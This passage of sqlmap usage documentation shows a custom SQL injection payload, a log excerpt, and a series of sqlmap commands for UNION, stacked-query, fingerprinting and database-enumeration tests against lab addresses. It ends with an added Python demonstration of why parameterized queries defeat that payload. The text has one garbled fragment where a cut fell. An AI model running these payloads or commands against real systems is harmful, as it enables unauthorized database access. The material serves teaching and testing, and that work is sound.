192.168.1.121:80
Accept-language: en-us,en;q=0.5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
Connection: close
[...]
[hh:mm:17] [INFO] GET parameter id is custom injectable
[...]

As you can see, the injection payload used to test for custom injection is:

id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test

which URL-decoded is:

id=1') AND 7433=7433 AND ('test'='test

and makes the page query syntactically correct:

SELECT * FROM users WHERE id=('1') AND 7433=7433 AND ('test'='test') LIMIT 0, 1

In this simple example sqlmap could detect and exploit the SQL injection without a custom injection payload, but in real-world applications it is sometimes necessary to provide one.

Page comparison

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --string "luther" -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --regexp "<td>lu[\w][\w]er" -v 1

Excluding page content from the comparison

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=1" --excl-reg "Dynamic content: ([\d]+)"

Stacked queries test (PHP's built-in mysql_query() function does not support multiple statements)

python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --stacked-test -v 1

UNION injection test

python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --union-test -v 1

UNION injection with the ORDER BY technique

python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1" --union-test --union-tech orderby -v 1
python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 --union-use --banner
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 5 --union-use --current-user
python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_partialunion.php?id=1" -v 1 --union-use --dbs

fingerprint

python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" -v 1 -f
python sqlmap.py -u "asp 
name=luther">http://192.168.123.36/sqlmap
|
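The following is an added example, not part of the sqlmap documentation above, showing why the custom-injection payload from the log keeps the page query syntactically valid, and why the same input is harmless once the parameter is bound instead of spliced into the SQL text. The users table, its rows, and the function names are constructed assumptions; only the URL-encoded id value is taken from the page.

```python
import sqlite3
from urllib.parse import unquote

# The URL-encoded id value shown in the sqlmap log above; every other name,
# table and row in this file is a constructed assumption for illustration.
ENCODED_PAYLOAD = "1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test"


def decode_payload(encoded: str) -> str:
    """URL-decode a query-string value the way the web server does before
    the application code ever sees it."""
    return unquote(encoded)


def build_query_unsafe(user_id: str) -> str:
    """Hypothetical vulnerable query builder: the decoded parameter is
    spliced straight into the SQL text, reproducing the page query from
    the text above."""
    return f"SELECT * FROM users WHERE id=('{user_id}') LIMIT 0, 1"


def make_db() -> sqlite3.Connection:
    """In-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [(1, "luther"), (2, "alice"), (3, "bob")],
    )
    conn.commit()
    return conn


def run_unsafe(conn: sqlite3.Connection, user_id: str) -> list:
    """Execute the spliced query. The payload's leading ') closes the
    intended comparison, and its trailing ('test'='test re-balances the
    quote and parenthesis the original query still appends, so the
    statement parses and the injected AND condition is evaluated."""
    return conn.execute(build_query_unsafe(user_id)).fetchall()


def run_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Same query with a bound parameter: the entire payload is compared
    as one value and never parsed as SQL, so the injection has no effect."""
    return conn.execute(
        "SELECT * FROM users WHERE id=(?) LIMIT 0, 1", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    payload = decode_payload(ENCODED_PAYLOAD)
    db = make_db()
    print("decoded payload :", payload)
    print("spliced query   :", build_query_unsafe(payload))
    print("unsafe result   :", run_unsafe(db, payload))
    print("bound result    :", run_parameterized(db, payload))
```

The unsafe path returns the id=1 row because the injected 7433=7433 condition is true, which is exactly the "page looks the same as id=1" signal sqlmap's --string and --regexp comparison options key on; the parameterized path returns nothing for the payload and the normal row for a plain "1", which is the property a fix should be tested against.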